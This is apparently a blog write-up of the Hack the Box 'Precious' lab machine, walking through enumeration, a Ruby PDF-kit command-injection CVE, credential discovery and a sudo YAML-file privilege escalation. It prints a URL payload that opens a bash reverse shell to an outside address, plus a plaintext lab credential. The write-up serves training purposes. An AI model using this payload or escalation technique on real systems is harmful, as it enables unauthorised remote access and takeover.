top of page
BlueDolphin

Hack the Box - Precious

Engagement flow

Summary

This machine starts off with some basic web enumeration. The user learns about a web page pdf conversion application. Some research reveals that this application is written in Ruby and has known CVE's for our version. Exploiting the web application provides our initial foothold as a user to the host via reverse shell.


From here we locate credentials in the users folder which allow for horizontal movement and access as a privileged user. For the root phase of this engagement, we learn about a "Sudo run as permission", that leads to a vulnerability from misconfigured permissions in a custom workflow that calls a .yml file as root. We are able to create a malicious .yml file to execute code under the automated workflow executing as root.

Tools used
  • Whatweb

  • linpeas


Processes/Techniques
  • Web enumeration

  • Command injection

  • Insecure file hijacking

  • sudo run as permission abuse

  • .yml file creation


Enumeration

We have a narrow attack surface as only 2 ports are open. Typically Port 22 for SSH is reserved for our connections back into the machine within the Hack the Box context. Port 80 however is likely where we will achieve our initial foothold through a CVE or misconfiguration of some sort.


Running a more in depth nmap scan reveals that port 80 is running

nginx 1.18.0 with a http-title: "Convert Web Page to PDF". 

Taking our web enumeration further, we utilize the tool whatweb to gather further information of our web service. We learn that Ruby-on-Rails is in use for the development of this web application. We also see that X-Powered-By[Phusion Passenger]. Researching this reveals it is a web application framework with support for Python, Node JS and Ruby on Rails. It is designed to integrate into Nginx or Apache.


Precious.HTB web application stack

  • NGINX Server - Web Server

  • Phusion Passenger - Web Application Server

  • Ruby on Rails - Web Application Framework

  • Convert Web Page to PDF - Web application Purpose


Browsing to the website we are presented with a very basic application. Some research however, suggests we have a Ruby PDF kit with known CVE's.


CVE 2022-25765


Reverse shell for initial foothold

Initially I tried the POC provided in the article above, linked back to synk io. I was unsure if the default POC was actually working or not, but it certainly was not obvious if was not working.


Default POC payload

http://example.com/?name=#{'%20`sleep 5`'}

Modified Payload

This difference here being the insertion of a reverse shell, but the addition of double quotes to allow for the initial call to the terminal.

http://example.com/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.15.64/6363 0>&1"`'}

We can see a successful connection in the below screenshot.


User Phase

In this phase we start looking for anything out of the ordinary. We attempted to leverage linpeas which resulted in making no progress. Some manual investigation, and a hint later I found the .bundle hidden directory in the ruby folder. This is a folder not normally seen in linux, and the deviation of such a file had not originally crossed my mind without asking for help. Drilling down into the folder, we find credentials in the config folder and these allow for a successful SSH connection.

henry:Q3c1AqGHtoI0aXAYFH


With these credentials we are able to obtain a successful shell as user Henry on the target system.


Root

For the Root phase we noticed that there is a run as permission set in place. The run as permission is attached to the /opt/update_dependencies.rb file.



We see that dependencies.yml is in use. Below is our optionional workflows. We can do this manually, or simply create a symbolic link.


  1. Henry can run /opt/update_dependencies.rb

  2. update_dependencies calls file.read looking for dependencies.yml

  3. Confirm path hijacking

  4. Craft malicious dependencies.yml

  5. Call malicious dependencies.yml with sudo

OR

The way which seemed more likely and exploitable. This will then output the string in the root flag as a standered error.

  1. Set a symbolic link to the flag via pointer attached to dependencies.yml

  2. /opt/update_dependencies.rb ---> dependencies.yml --> /root/root.txt

  3. Sudo call



551 views0 comments

Comments


bottom of page